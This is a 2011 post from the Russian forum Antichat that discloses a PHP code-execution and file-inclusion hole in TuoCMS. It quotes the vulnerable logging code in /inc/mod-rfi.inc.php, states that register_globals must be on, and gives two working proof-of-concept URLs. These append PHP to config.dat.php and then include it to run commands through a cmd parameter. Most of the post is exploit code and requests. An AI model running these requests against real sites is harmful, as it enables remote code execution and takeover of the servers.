08.05.2011, 03:55
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
TuoCMS
1. PHP Code Execution + LFI
File: /inc/mod-rfi.inc.php
Need: rg = on
PHP код:
[COLOR="#000000"]$pos1 = strpos($pagina, "tp://");
$pos2 = strpos($pagina, "tps://");
if (($pos1 === false) && ($pos2 === false)) {
} else {
..............................
if (!file_exists($ifile)) {
$string = "[COLOR="#0000BB"][/COLOR]\n";
$llog = fopen($ifile,"w+");
$string = fwrite($llog, $string);
fputs($llog,"# $subject\n $body\n");
fclose($llog);
}else{
$llog = fopen ($ifile,"a+");
fputs($llog,"# $subject\n $body\n");
fclose($llog);
}
[/COLOR]
Посмотрев на код видно, что если передавать существующий файл, то в файл впишется верху и это нам все обломает. Поэтому мы будем записывать в конец уже имеющегося файла.
PoC:
1) http://localhost/inc/mod-rfi.inc.php?pagina=http://&ifile=../config.dat.php
2) http://localhost/index.php?pagina=config.dat.php&cmd=phpinfo(); |
|
|